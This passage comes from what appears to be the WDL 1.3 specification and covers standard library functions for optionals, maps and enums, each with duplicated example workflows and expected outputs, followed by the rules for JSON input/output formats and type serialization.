Int fiveB = select_first([maybe_four_but_is_not, maybe_five, maybe_three])
Int fiveC = select_first([], 5)
Int fiveD = select_first([None], 5)
}
}
Example input:
{}
Example output:
{
"test_select_first.fiveA": 5,
"test_select_first.fiveB": 5,
"test_select_first.fiveC": 5,
"test_select_first.fiveD": 5
}
Example: select_first_only_none_fail.wdl
version 1.3
workflow select_first_only_none_fail {
Int? maybe_four_but_is_not = None
Int result = select_first([maybe_four_but_is_not]) # error! array contains only None values
}
version 1.3
workflow select_first_only_none_fail {
Int? maybe_four_but_is_not = None
Int result = select_first([maybe_four_but_is_not]) # error! array contains only None values
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Example: select_first_empty_fail.wdl
version 1.3
workflow select_first_empty_fail {
Int check = select_first([]) # error! array is empty
}
version 1.3
workflow select_first_empty_fail {
Int check = select_first([]) # error! array is empty
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
select_all
Array[X] select_all(Array[X?])
Filters the input Array of optional values by removing all None values. The elements in the output Array are in the same order as the input Array. If the input array is empty or contains only None values, an empty array is returned.
Parameters
Array[X?]:Arrayof optional values.
Returns: an Array of all non-None values in the input array.
Example: test_select_all.wdl
version 1.3
workflow test_select_all {
input {
Int? maybe_five = 5
Int? maybe_four_but_is_not = None
Int? maybe_three = 3
}
Array[Int] fivethree = select_all([maybe_five, maybe_four_but_is_not, maybe_three])
Array[Int] expected = [5, 3]
output {
Boolean is_true = length(fivethree) == 2 && fivethree == expected
}
}
version 1.3
workflow test_select_all {
input {
Int? maybe_five = 5
Int? maybe_four_but_is_not = None
Int? maybe_three = 3
}
Array[Int] fivethree = select_all([maybe_five, maybe_four_but_is_not, maybe_three])
Array[Int] expected = [5, 3]
output {
Boolean is_true = length(fivethree) == 2 && fivethree == expected
}
}
Example input:
{}
Example output:
{
"test_select_all.is_true": true
}
Map Functions
These functions are generic and take a Map as input and/or return a Map.
Restrictions: None
as_pairs
Array[Pair[P, Y]] as_pairs(Map[P, Y])
Converts a Map into an Array of Pairs. Since Maps are ordered, the output array will always have elements in the same order they were added to the Map.
Parameters
Map[P, Y]:Mapto convert toPairs.
Returns: Ordered Array of Pairs, where each pair contains the key (left) and value (right) of a Map element.
Example: test_as_pairs.wdl
version 1.3
workflow test_as_pairs {
Map[String, Int] x = {"a": 1, "c": 3, "b": 2}
Map[String, Pair[File, File]] y = {"a": ("data/questions.txt", "data/answers.txt"), "b": ("data/request.txt", "data/response.txt")}
Array[Pair[String, Int]] expected1 = [("a", 1), ("c", 3), ("b", 2)]
Array[Pair[File, String]] expected2 = [("data/questions.txt", "a"), ("data/request.txt", "b")]
Map[File, String] expected3 = {"data/questions.txt": "a", "data/request.txt": "b"}
scatter (item in as_pairs(y)) {
String s = item.left
Pair[File, File] files = item.right
Pair[File, String] bams = (files.left, s)
}
Map[File, String] bam_to_name = as_map(bams)
output {
Boolean is_true1 = as_pairs(x) == expected1
Boolean is_true2 = bams == expected2
Boolean is_true3 = bam_to_name == expected3
}
}
version 1.3
workflow test_as_pairs {
Map[String, Int] x = {"a": 1, "c": 3, "b": 2}
Map[String, Pair[File, File]] y = {"a": ("data/questions.txt", "data/answers.txt"), "b": ("data/request.txt", "data/response.txt")}
Array[Pair[String, Int]] expected1 = [("a", 1), ("c", 3), ("b", 2)]
Array[Pair[File, String]] expected2 = [("data/questions.txt", "a"), ("data/request.txt", "b")]
Map[File, String] expected3 = {"data/questions.txt": "a", "data/request.txt": "b"}
scatter (item in as_pairs(y)) {
String s = item.left
Pair[File, File] files = item.right
Pair[File, String] bams = (files.left, s)
}
Map[File, String] bam_to_name = as_map(bams)
output {
Boolean is_true1 = as_pairs(x) == expected1
Boolean is_true2 = bams == expected2
Boolean is_true3 = bam_to_name == expected3
}
}
Example input:
{}
Example output:
{
"test_as_pairs.is_true1": true,
"test_as_pairs.is_true2": true,
"test_as_pairs.is_true3": true
}
as_map
Map[P, Y] as_map(Array[Pair[P, Y]])
Converts an Array of Pairs into a Map in which the left elements of the Pairs are the keys and the right elements the values. All the keys must be unique, or an error is raised. The order of the key/value pairs in the output Map is the same as the order of the Pairs in the Array.
Parameters
Array[Pair[P, Y]]: Array ofPairs to convert to aMap.
Returns: Map[P, Y] of the elements in the input array.
Example: test_as_map.wdl
version 1.3
workflow test_as_map {
input {
Array[Pair[String, Int]] x = [("a", 1), ("c", 3), ("b", 2)]
Array[Pair[String, Pair[File,File]]] y = [("a", ("data/cities.txt", "data/comment.txt")), ("b", ("data/hello.txt", "data/greetings.txt"))]
Map[String, Int] expected1 = {"a": 1, "c": 3, "b": 2}
Map[String, Pair[File, File]] expected2 = {"a": ("data/cities.txt", "data/comment.txt"), "b": ("data/hello.txt", "data/greetings.txt")}
}
output {
Boolean is_true1 = as_map(x) == expected1
Boolean is_true2 = as_map(y) == expected2
}
}
version 1.3
workflow test_as_map {
input {
Array[Pair[String, Int]] x = [("a", 1), ("c", 3), ("b", 2)]
Array[Pair[String, Pair[File,File]]] y = [("a", ("data/cities.txt", "data/comment.txt")), ("b", ("data/hello.txt", "data/greetings.txt"))]
Map[String, Int] expected1 = {"a": 1, "c": 3, "b": 2}
Map[String, Pair[File, File]] expected2 = {"a": ("data/cities.txt", "data/comment.txt"), "b": ("data/hello.txt", "data/greetings.txt")}
}
output {
Boolean is_true1 = as_map(x) == expected1
Boolean is_true2 = as_map(y) == expected2
}
}
Example input:
{}
Example output:
{
"test_as_map.is_true1": true,
"test_as_map.is_true2": true
}
Example: test_as_map_fail.wdl
version 1.3
workflow test_as_map_fail {
# this fails with an error - the "a" key is duplicated
Boolean bad = as_map([("a", 1), ("a", 2)])
}
version 1.3
workflow test_as_map_fail {
# this fails with an error - the "a" key is duplicated
Boolean bad = as_map([("a", 1), ("a", 2)])
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
keys
Array[P] keys(Map[P, Y])
Array[String] keys(Struct|Object)
Given a key-value type collection (Map, Struct, or Object), returns an Array of the keys from the input collection, in the same order as the elements in the collection.
When the argument is a Struct, the returned array will contain the keys in the same order they appear in the struct definition. When the argument is an Object, the returned array has no guaranteed order.
When the input Map or Object is empty, an empty array is returned.
Parameters
Map[P, Y]|Struct|Object: Collection from which to extract keys.
Returns: Array[P] of the input collection's keys. If the input is a Struct or Object, then the returned array will be of type Array[String].
Example: test_keys.wdl
version 1.3
struct Name {
String first
String last
}
workflow test_keys {
input {
Map[String, Int] x = {"a": 1, "b": 2, "c": 3}
Map[String, Pair[File, File]] str_to_files = {
"a": ("data/questions.txt", "data/answers.txt"),
"b": ("data/request.txt", "data/response.txt")
}
Name name = Name {
first: "John",
last: "Doe"
}
}
scatter (item in as_pairs(str_to_files)) {
String key = item.left
}
Array[String] str_to_files_keys = key
Array[String] expected = ["a", "b", "c"]
Array[String] expectedKeys = ["first", "last"]
output {
Boolean is_true1 = length(keys(x)) == 3 && keys(x) == expected
Boolean is_true2 = str_to_files_keys == keys(str_to_files)
Boolean is_true3 = length(keys(name)) == 2 && keys(name) == expectedKeys
}
}
version 1.3
struct Name {
String first
String last
}
workflow test_keys {
input {
Map[String, Int] x = {"a": 1, "b": 2, "c": 3}
Map[String, Pair[File, File]] str_to_files = {
"a": ("data/questions.txt", "data/answers.txt"),
"b": ("data/request.txt", "data/response.txt")
}
Name name = Name {
first: "John",
last: "Doe"
}
}
scatter (item in as_pairs(str_to_files)) {
String key = item.left
}
Array[String] str_to_files_keys = key
Array[String] expected = ["a", "b", "c"]
Array[String] expectedKeys = ["first", "last"]
output {
Boolean is_true1 = length(keys(x)) == 3 && keys(x) == expected
Boolean is_true2 = str_to_files_keys == keys(str_to_files)
Boolean is_true3 = length(keys(name)) == 2 && keys(name) == expectedKeys
}
}
Example input:
{}
Example output:
{
"test_keys.is_true1": true,
"test_keys.is_true2": true,
"test_keys.is_true3": true
}
contains_key
as of version 1.2
* Boolean contains_key(Map[P, Y], P)
* Boolean contains_key(Object, String)
* Boolean contains_key(Map[String, Y]|Struct|Object, Array[String])
Given a key-value type collection (Map, Struct, or Object) and a key, tests whether the collection contains an entry with the given key.
This function has three choices:
Boolean contains_key(Map[P, Y], P): Tests whether theMaphas an entry with the given key. IfPis an optional type (e.g.,String?), then the second argument may beNone.Boolean contains_key(Object, String): Tests whether theObjecthas an entry with the given name.Boolean contains_key(Map[String, Y]|Struct|Object, Array[String]): Tests recursively for the presence of a compound key within a nested collection.
For the third choice, the first argument is a collection that may be nested to any level, i.e., contain values that are collections, which themselves may contain collections, and so on. The second argument is an array of keys that are resolved recursively. If the value associated with any except the last key in the array is None or not a collection type, this function returns false.
For example, if the first argument is a Map[String, Map[String, Int]] and the second argument is ["foo", "bar"], then the outer Map is tested for the presence of key "foo", and if it is present, then its value is tested for the presence of key "bar". This only tests for the presence of the named element, not whether or not it is defined.
Parameters
Map[P, Y]|Struct|Object: Collection to search for the key.P|Array[String]: The key to search. If the first argument is aMap, then the key must be of the same type as theMap's key type. If theMap's key type is optional then the key may also be optional. If the first argument is aMap[String, Y],Struct, orObject, then the key may be either aStringorArray[String].
Returns: true if the collection contains the key, otherwise false.
Example
Example: test_contains_key.wdl
version 1.3
struct Person {
String name
Map[String, String] details
}
workflow test_contains_key {
input {
Map[String, Int] m
String key1
String key2
Person p1
Person p2
}
output {
Int? i1 = if contains_key(m, key1) then m[key1] else None
Int? i2 = if contains_key(m, key2) then m[key2] else None
String? phone1 = if contains_key(p1.details, "phone") then p1.details["phone"] else None
String? phone2 = if contains_key(p2.details, "phone") then p2.details["phone"] else None
}
}
version 1.3
struct Person {
String name
Map[String, String] details
}
workflow test_contains_key {
input {
Map[String, Int] m
String key1
String key2
Person p1
Person p2
}
output {
Int? i1 = if contains_key(m, key1) then m[key1] else None
Int? i2 = if contains_key(m, key2) then m[key2] else None
String? phone1 = if contains_key(p1.details, "phone") then p1.details["phone"] else None
String? phone2 = if contains_key(p2.details, "phone") then p2.details["phone"] else None
}
}
Example input:
{
"test_contains_key.m": {"a": 1, "b": 2},
"test_contains_key.key1": "a",
"test_contains_key.key2": "c",
"test_contains_key.p1": {
"name": "John",
"details": {
"phone": "123-456-7890"
}
},
"test_contains_key.p2": {
"name": "Agent X",
"details": {
}
}
}
Example output:
{
"test_contains_key.i1": 1,
"test_contains_key.i2": null,
"test_contains_key.phone1": "123-456-7890",
"test_contains_key.phone2": null
}
values
as of version 1.2
Array[Y] values(Map[P, Y])
Returns an Array of the values from the input Map, in the same order as the elements in the map. If the map is empty, an empty array is returned.
Parameters
Map[P, Y]:Mapfrom which to extract values.
Returns: Array[Y] of the input Maps values.
Example
Example: test_values.wdl
version 1.3
task add {
input {
Int x
Int y
}
Int z = x + y
command <<<
echo "~{x} + ~{y} = ~{z}"
>>>
output {
Int sum = z
}
}
workflow test_values {
input {
Map[String, Pair[Int, Int]] str_to_ints = {
"a": (1, 2),
"b": (3, 4)
}
}
scatter (ints in values(str_to_ints)) {
call add { x=ints.left, y=ints.right }
}
output {
Array[Int] sums = add.sum
}
}
version 1.3
task add {
input {
Int x
Int y
}
Int z = x + y
command <<<
echo "~{x} + ~{y} = ~{z}"
>>>
output {
Int sum = z
}
}
workflow test_values {
input {
Map[String, Pair[Int, Int]] str_to_ints = {
"a": (1, 2),
"b": (3, 4)
}
}
scatter (ints in values(str_to_ints)) {
call add { x=ints.left, y=ints.right }
}
output {
Array[Int] sums = add.sum
}
}
Example input:
{}
Example output:
{
"test_values.sums": [3, 7]
}
collect_by_key
Map[P, Array[Y]] collect_by_key(Array[Pair[P, Y]])
Given an Array of Pairs, creates a Map in which the right elements of the Pairs are grouped by the left elements. In other words, the input Array may have multiple Pairs with the same key. Rather than causing an error (as would happen with as_map), all the values with the same key are grouped together into an Array.
The order of the keys in the output Map is the same as the order of their first occurrence in the input Array. The order of the elements in the Map values is the same as their order of occurrence in the input Array.
Parameters
Array[Pair[P, Y]]:ArrayofPairs to group.
Returns: Map of keys to Arrays of values.
Example: test_collect_by_key.wdl
version 1.3
workflow test_collect_by_key {
input {
Array[Pair[String, Int]] x = [("a", 1), ("b", 2), ("a", 3)]
Array[Pair[String, Pair[File, File]]] y = [
("a", ("data/questions.txt", "data/answers.txt")),
("b", ("data/request.txt", "data/response.txt")),
("a", ("data/wizard.txt", "data/spell.txt"))
]
Map[String, Array[Int]] expected1 = {"a": [1, 3], "b": [2]}
Map[String, Array[Pair[File, File]]] expected2 = {
"a": [("data/questions.txt", "data/answers.txt"), ("data/wizard.txt", "data/spell.txt")],
"b": [("data/request.txt", "data/response.txt")]
}
}
output {
Boolean is_true1 = collect_by_key(x) == expected1
Boolean is_true2 = collect_by_key(y) == expected2
}
}
version 1.3
workflow test_collect_by_key {
input {
Array[Pair[String, Int]] x = [("a", 1), ("b", 2), ("a", 3)]
Array[Pair[String, Pair[File, File]]] y = [
("a", ("data/questions.txt", "data/answers.txt")),
("b", ("data/request.txt", "data/response.txt")),
("a", ("data/wizard.txt", "data/spell.txt"))
]
Map[String, Array[Int]] expected1 = {"a": [1, 3], "b": [2]}
Map[String, Array[Pair[File, File]]] expected2 = {
"a": [("data/questions.txt", "data/answers.txt"), ("data/wizard.txt", "data/spell.txt")],
"b": [("data/request.txt", "data/response.txt")]
}
}
output {
Boolean is_true1 = collect_by_key(x) == expected1
Boolean is_true2 = collect_by_key(y) == expected2
}
}
Example input:
{}
Example output:
{
"test_collect_by_key.is_true1": true,
"test_collect_by_key.is_true2": true
}
โจ Enum Functions
These functions operate on enum values.
Restrictions: None
โจ value
T value(Enum)
Returns the underlying value associated with an enum choice.
Parameters
Enum: an enum choice of any enum type.
Returns: The choice's associated value.
Example: test_enum_value.wdl
version 1.3
enum Color {
Red = "#FF0000",
Green = "#00FF00",
Blue = "#0000FF"
}
enum Priority {
Low = 1,
Medium = 5,
High = 10
}
workflow test_enum_value {
input {
Color color = Color.Red
Priority priority = Priority.High
}
output {
String choice_name = "~{color}" # "Red"
String hex_value = value(color) # "#FF0000"
Int priority_num = value(priority) # 10
Boolean values_equal = value(Color.Red) == value(Color.Red) # true
Boolean choices_equal = Color.Red == Color.Red # true
}
}
version 1.3
enum Color {
Red = "#FF0000",
Green = "#00FF00",
Blue = "#0000FF"
}
enum Priority {
Low = 1,
Medium = 5,
High = 10
}
workflow test_enum_value {
input {
Color color = Color.Red
Priority priority = Priority.High
}
output {
String choice_name = "~{color}" # "Red"
String hex_value = value(color) # "#FF0000"
Int priority_num = value(priority) # 10
Boolean values_equal = value(Color.Red) == value(Color.Red) # true
Boolean choices_equal = Color.Red == Color.Red # true
}
}
Example input:
{
"test_enum_value.color": "Red",
"test_enum_value.priority": "High"
}
Example output:
{
"test_enum_value.choice_name": "Red",
"test_enum_value.hex_value": "#FF0000",
"test_enum_value.priority_num": 10,
"test_enum_value.values_equal": true,
"test_enum_value.choices_equal": true
}
Other Functions
defined
Boolean defined(X?)
Tests whether the given optional value is defined, i.e., has a non-None value.
Parameters
X?: optional value of any type.
Returns: false if the input value is None, otherwise true.
Example: is_defined.wdl
version 1.3
workflow is_defined {
input {
String? name
}
if (defined(name)) {
call say_hello { name = select_first([name]) }
}
output {
String? greeting = say_hello.greeting
}
}
task say_hello {
input {
String name
}
command <<< printf "Hello ~{name}" >>>
output {
String greeting = read_string(stdout())
}
}
version 1.3
workflow is_defined {
input {
String? name
}
if (defined(name)) {
call say_hello { name = select_first([name]) }
}
output {
String? greeting = say_hello.greeting
}
}
task say_hello {
input {
String name
}
command <<< printf "Hello ~{name}" >>>
output {
String greeting = read_string(stdout())
}
}
Example input:
{
"is_defined.name": "John"
}
Example output:
{
"is_defined.greeting": "Hello John"
}
length
Int length(Array[X]|Map[X, Y]|Object|String)
Returns the length of the input argument as an Int:
- For an
Array[X]argument: the number of elements in the array. - For a
Map[X, Y]argument: the number of items in the map. - For an
Objectargument: the number of key-value pairs in the object. - For a
Stringargument: the number of characters in the string.
Parameters
Array[X]|Map[X, Y]|Object|String: A collection or string whose elements are to be counted.
Returns: The length of the collection/string as an Int.
Example: test_length.wdl
version 1.3
workflow test_length {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b", "c"]
Array[String] zs = []
Map[String, Int] m = {"a": 1, "b": 2}
String s = "ABCDE"
output {
Int xlen = length(xs)
Int ylen = length(ys)
Int zlen = length(zs)
Int mlen = length(m)
Int slen = length(s)
}
}
version 1.3
workflow test_length {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b", "c"]
Array[String] zs = []
Map[String, Int] m = {"a": 1, "b": 2}
String s = "ABCDE"
output {
Int xlen = length(xs)
Int ylen = length(ys)
Int zlen = length(zs)
Int mlen = length(m)
Int slen = length(s)
}
}
Example input:
{}
Example output:
{
"test_length.xlen": 3,
"test_length.ylen": 3,
"test_length.zlen": 0,
"test_length.mlen": 2,
"test_length.slen": 5
}
Input and Output Formats
WDL uses JSON as its native serialization format for task and workflow inputs and outputs. The specifics of these formats are described below.
All WDL implementations are required to support the standard JSON input and output formats. WDL compliance testing is performed using test cases whose inputs and expected outputs are given in these formats. A WDL implementation may choose to provide additional input and output mechanisms so long as they are documented, and/or tools are provided to interconvert between engine-specific input and the standard JSON format, to foster interoperability between tools in the WDL ecosystem.
JSON Input Format
The inputs for a workflow invocation may be specified as a single JSON object that contains one member for each top-level workflow input. The name of the object member is the fully-qualified name of the input parameter, and the value is the serialized form of the WDL value.
If the WDL implementation supports the allow_nested_inputs hint, then optional inputs for nested calls can also be specified in the input JSON, provided the call does not already specify a value for the input. Nested inputs are referenced using the name of the call, which may be different from the name of the task or subworkflow (i.e., if is imported or called with an alias). When a call appears within a scatter, setting the value of an input applies to every instance of the call.
Here is an example JSON input file for a workflow wf:
{
"wf.int_val": 3,
"wf.my_ints": [5, 6, 7, 8],
"wf.ref_file": "/path/to/file.txt",
"wf.some_struct": {
"fieldA": "some_string",
"fieldB": 42,
"fieldC": "/path/to/file.txt"
},
"wf.call1.s": "call 1 input",
"wf.call2.s": "call 2 input"
}
WDL implementations are only required to support workflow execution, and not necessarily task execution, so a JSON input format for tasks is not specified. However, it is strongly suggested that if an implementation does support task execution, that it also supports this JSON input format for tasks. It is left to the discretion of the WDL implementation whether it is required to prefix the task input with the task name, i.e., mytask.infile vs. infile.
File/Directory Inputs
It is up to the execution engine to resolve input files and directories and stage them into the execution environment. The execution engine is free to specify the values that are allowed for File and Directory parameters, but at a minimum it is required to support POSIX absolute file paths (e.g., /path/to/file).
It is strongly recommended that input files and directories be specified as absolute paths to local files or as URLs. If relative paths are allowed, then it is suggested that they be resolved relative to the directory that contains the input JSON file (if a file is provided) or to the working directory in which the workflow is initially launched.
Optional Inputs
If a workflow has an optional input, its value may or may not be specified in the JSON input. It is also valid to explicitly set the value of an optional input to be undefined using JSON null.
For example, given this workflow:
workflow foo {
input {
File? x
Int? y = 5
}
}
The following would all be valid JSON inputs:
# no input
{}
# only x
{
"x": 100
}
# only y
{
"x": null,
"y": "/path/to/file"
}
# x and y
{
"x": 1000,
"y": "/path/to/file"
}
# override y default and set it to None
{
"y": null
}
Specifying / Overriding Requirements and Hints
Requirement and hint attributes can be specified (or overridden) for any task in the JSON input file. To differentiate requirements and hints from task inputs, the requirements or hints namespace is added after the task name.
{
"wf.task1.requirements.memory": "16 GB",
"wf.task2.requirements.cpu": 2,
"wf.task2.requirements.disks": "100",
"wf.subwf.task3.requirements.container": "mycontainer:latest",
"wf.task4.hints.foo": "bar"
}
Overriding an attribute for a task nested within a scatter applies to all invocations of that task.
Unlike inputs, a WDL implementation must support overriding requirements and hints regardless of whether it supports the allow_nested_inputs workflow hint. Requirements and hints specified in the input JSON always supersede values supplied directly in the WDL. Any hints that are not supported by the execution engine are ignored.
JSON Output Format
The outputs from a workflow invocation may be serialized as a JSON object that contains one member for each top-level workflow output; subworkflow and task outputs are not provided. The name of the object member is the fully-qualified name of the output parameter, and the value is the serialized form of the WDL value.
Every WDL implementation must provide the ability to serialize workflow outputs in this standard format. It is suggested that WDL implementations make the standard format be the default output format.
For example, given this workflow:
workflow example {
...
output {
String foo = cafeteria.inn
File analysis_results = analysis.results
Int read_count = readcounter.result
Float kessel_run_parsecs = trip_to_space.distance
Boolean sample_swap_detected = array_concordance.concordant
Array[File] sample_choices = choice_calling.vcfs
Map[String, Int] droids = escape_pod.cargo
}
}
The output JSON will look like:
{
"example.foo": "bar",
"example.analysis_results": "/path/to/my/analysis/results.txt",
"example.read_count": 50157187,
"example.kessel_run_parsecs": 11.98,
"example.sample_swap_detected": false,
"example.sample_choices": ["/data/patient1.vcf", "/data/patient2.vcf"],
"example.droids": {"C": 3, "D": 2, "P": 0, "R": 2}
}
It is recommended (but not required) that JSON outputs be "pretty printed" to be more human-readable.
File/Directory Outputs
It is up to the execution engine to provide workflow File and Directory outputs to the user that persist following a successful execution of the workflow. The execution engine is free to specify the values that are allowed for File and Directory parameters, but at a minimum it is required to support POSIX absolute file paths (e.g., /path/to/file).
It is strongly recommended that output files and directories be specified as absolute paths to local files or as URLs. If relative paths are allowed, then it is suggested that they be resolved relative to the directory that contains the output JSON file (if a file is written) or to a single common directory containing all the workflow outputs.
Extended File/Directory Input/Output Format
There is no guarantee that executing a workflow multiple times with the same input file or directory URIs will result in the same outputs. For example the contents of a file may change between one execution and the next, or a file may be added to or removed from a directory.
To help ensure the reproducibility of workflow executions, and to support job output reuse features of the runtime engine (sometimes called "call caching"), it is strongly recommended that runtime engines support the more explicit extended format for File and Directory inputs and outputs.
In the extended format, File and Directory inputs and outputs may be specified using either a JSON string or object.
A directory object has the following attributes:
type: Always "Directory"; optional for the top-level inputs/outputs but required within directory listings.location: The directory URI. This is equivalent to the string value in the simple form. May be absent if the directory is within a listing as long asbasenameis specified. If location is not specified, thenbasenameandlistingare both required, and all files/directories in the listing must have a location that is an absolute path or URI.basename: The name of the directory relative to the containing directory. If the basename differs from the actual directory name at the given location, the file must be localized with the given basename.listing: An array of files/subdirectories within the directory. May be nested to any degree.
A file object has the following attributes:
type: Always "File"; optional for top-level inputs/outputs but required within directory listings.location: The file URI. This is equivalent to the string value in the simple form. May be absent if the file is within a listing so long asbasenameis specified.basename: The name of the file relative to the containing directory. If the basename differs from the actual file name at the given location, the file must be localized with the given basename.
It is recommended that the runtime engine support additional attributes to promote reproducibility, such as a file checksum.
The following example shows a directory input in extended format. The directory listing makes explicit the structure of the directory. If a file were added to the source directory between one execution and the next, the new file would be ignored since it doesn't appear in the listing. If a file were removed from the source directory between one execution and the next, the workflow execution would fail because the input directory would not match the expected structure.
{
"wf.indir": {
"location": "/mnt/data/results/foo",
"listing": [
{
"type": "File",
"location": "/mnt/data/results/foo/bar.txt",
"basename": "something_else.txt"
},
{
"type": "Directory",
"basename": "baz",
"listing": [
{
"type": "File",
"basename": "qux.fa"
}
]
}
]
}
}
When this directory is localized, it will result in the following local folder structure:
<workdir>
|_ foo
|_ something_else.txt
|_ baz
|_ qux.fa
A directory listing can also be used to construct an input directory from files that originate from disparate locations. The following input would result in the same local directory structure as above:
{
"wf.indir": {
"basename": "foo",
"listing": [
{
"type": "File",
"location": "/mnt/data/results/foo/bar.txt",
"basename": "something_else.txt"
},
{
"type": "Directory",
"basename": "baz",
"listing": [
{
"type": "File",
"location": "/home/fred/qux.fa"
}
]
}
]
}
}
JSON Serialization of WDL Types
Primitive Types
All primitive WDL types serialize naturally to JSON values:
| WDL Type | JSON Type |
|---|---|
Int | number |
Float | number |
Boolean | boolean |
String | string |
File | string |
Directory | string |
None | null |
JSON has a single numeric type - it does not differentiate between integral and floating point values. A JSON number is always deserialized to a WDL Float, which may then be coerced to an Int if necessary.
JSON does not have a specific type for filesystem paths, but a WDL String may be coerced to a File if necessary.
Array
Arrays are represented naturally in JSON using the array type. Each array element is serialized recursively into its JSON format.
When a JSON array is deserialized to WDL, each element of the array must be coercible to a common type.
Struct and Object
Structs and Objects are represented naturally in JSON using the object type. Each WDL Struct or Object member value is serialized recursively into its JSON format.
A JSON object is deserialized to a WDL Object value, and each member value is deserialized to its most likely WDL type. The WDL Object may then be coerced to a Struct or Map type if necessary.
Pair
There is no natural or unambiguous serialization of a Pair to JSON. Attempting to serialize a Pair results in an error. A Pair must first be converted to a serializable type, e.g., using one of the following suggested methods.
Pair to Array
A Pair[X, X] may be converted to a two-element array.
Example: pair_to_array.wdl
version 1.3
workflow pair_to_array {
Pair[Int, Int] p = (1, 2)
Array[Int] a = [p.left, p.right]
# We can convert back to Pair as needed
Pair[Int, Int] p2 = (a[0], a[1])
output {
Array[Int] aout = a
}
}
version 1.3
workflow pair_to_array {
Pair[Int, Int] p = (1, 2)
Array[Int] a = [p.left, p.right]
# We can convert back to Pair as needed
Pair[Int, Int] p2 = (a[0], a[1])
output {
Array[Int] aout = a
}
}
Example input:
{}
Example output:
{
"pair_to_array.aout": [1, 2]
}
Pair to Struct
A Pair[X, Y] may be converted to a struct with two members X left and Y right.
Example: pair_to_struct.wdl
version 1.3
struct StringIntPair {
String l
Int r
}
workflow pair_to_struct {
Pair[String, Int] p = ("hello", 42)
StringIntPair s = StringIntPair {
l: p.left,
r: p.right
}
# We can convert back to Pair as needed
Pair[String, Int] p2 = (s.l, s.r)
output {
StringIntPair sout = s
}
}
version 1.3
struct StringIntPair {
String l
Int r
}
workflow pair_to_struct {
Pair[String, Int] p = ("hello", 42)
StringIntPair s = StringIntPair {
l: p.left,
r: p.right
}
# We can convert back to Pair as needed
Pair[String, Int] p2 = (s.l, s.r)
output {
StringIntPair sout = s
}
}
Example input:
{}
Example output:
{
"pair_to_struct.sout": {
"l": "hello",
"r": 42
}
}
Map
A Map[String, X] may be serialized to a JSON object by the same mechanism as a WDL Struct or Object. This value will be deserialized to a WDL Object, after which it may be coerced to a Map.
There is no natural or unambiguous serialization of a Map with a non-String key type. Attempting to serialize a Map with a non-String key type results in an error. A Map with non-String keys must first be converted to a serializable type, e.g., using one of the following suggested methods.
Map to Struct
A Map[P, Y] can be converted to a Struct with two array members: Array[X] keys and Array[Y] values. This is the suggested approach.
Example: map_to_struct2.wdl
version 1.3
struct IntStringMap {
Array[Int] keys
Array[String] values
}
workflow map_to_struct2 {
Map[Int, String] m = {0: "a", 1: "b"}
Array[Pair[Int, String]] int_string_pairs = as_pairs(m)
Pair[Array[Int], Array[String]] int_string_arrays = unzip(int_string_pairs)
IntStringMap s = IntStringMap {
keys: int_string_arrays.left,
values: int_string_arrays.right
}
# We can convert back to Map
Map[Int, String] m2 = as_map(zip(s.keys, s.values))
output {
IntStringMap sout = s
Boolean is_equal = m == m2
}
}
version 1.3
struct IntStringMap {
Array[Int] keys
Array[String] values
}
workflow map_to_struct2 {
Map[Int, String] m = {0: "a", 1: "b"}
Array[Pair[Int, String]] int_string_pairs = as_pairs(m)
Pair[Array[Int], Array[String]] int_string_arrays = unzip(int_string_pairs)
IntStringMap s = IntStringMap {
keys: int_string_arrays.left,
values: int_string_arrays.right
}
# We can convert back to Map
Map[Int, String] m2 = as_map(zip(s.keys, s.values))
output {
IntStringMap sout = s
Boolean is_equal = m == m2
}
}
Example input:
{}
Example output:
{
"map_to_struct2.sout": {
"keys": [0, 1],
"values": ["a", "b"]
},
"map_to_struct2.is_equal": true
}
Map to Array
A Map[P, P] can be converted to an array of Pairs. Each pair can then be converted to a serializable format using one of the methods described in the previous section. This approach is less desirable as it requires the use of a scatter.
Example: map_to_array.wdl
version 1.3
workflow map_to_array {
Map[Int, Int] m = {0: 7, 1: 42}
Array[Pair[Int, Int]] int_int_pairs = as_pairs(m)
scatter (p in int_int_pairs) {
Array[Int] a = [p.left, p.right]
}
output {
Array[Array[Int]] aout = a
}
}
version 1.3
workflow map_to_array {
Map[Int, Int] m = {0: 7, 1: 42}
Array[Pair[Int, Int]] int_int_pairs = as_pairs(m)
scatter (p in int_int_pairs) {
Array[Int] a = [p.left, p.right]
}
output {
Array[Array[Int]] aout = a
}
}
Example input:
{}
Example output:
{
"map_to_array.aout": [[0, 7], [1, 42]]
}
Appendix A: WDL Value Serialization and Deserialization
This section provides suggestions for ways to deal with primitive and compound values in the task command section. When a WDL execution engine instantiates a command specified in the command section of a task, it must evaluate all expression placeholders (~{...} and ${...}) in the command and coerce their values to strings. There are multiple different ways that WDL values can be communicated to the command(s) being called in the command section, and the best method will vary by command.
For example, a task that wraps a tool that operates on an Array of FASTQ files has several ways that it can specify the list of files to the tool:
- A file containing one file path per line, e.g.
Rscript analysis.R --files=fastq_list.txt - A file containing a JSON list, e.g.
Rscript analysis.R --files=fastq_list.json - Enumerated on the command line, e.g.
Rscript analysis.R 1.fastq 2.fastq 3.fastq
On the other end, command line tools will output results in files or to standard output, and these outputs need to be converted to WDL values to be used as task outputs. For example, the FASTQ processor task mentioned above outputs a mapping of the input files to the number of reads in each file. This output might be represented as a two-column TSV or as a JSON object, both of which would need to be deserialized to a WDL Map[File, Int] value.
The various methods for serializing and deserializing primitive and compound values are enumerated below.
Primitive Values
WDL primitive values are naturally converted to string values. This is described in detail in the string interpolation section.
Deserialization of primitive values is done via one of the read_* functions, each of which deserializes a different type of primitive value from a file. The file must contain a single value of the expected type, with optional whitespace. The value is read as a string and then converted to the appropriate type, or raises an error if the value cannot be converted.
Example: read_write_primitives_task.wdl
version 1.3
task read_write_primitives {
input {
String s
Int i
}
command <<<
printf ~{s} > str_file
printf ~{i} > int_file
>>>
output {
String sout = read_string("str_file")
String istr = read_string("int_file")
Int iout = read_int("int_file")
# This would cause an error since "hello" cannot be converted to an Int:
#Int sint = read_int("str_file")
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task read_write_primitives {
input {
String s
Int i
}
command <<<
printf ~{s} > str_file
printf ~{i} > int_file
>>>
output {
String sout = read_string("str_file")
String istr = read_string("int_file")
Int iout = read_int("int_file")
# This would cause an error since "hello" cannot be converted to an Int:
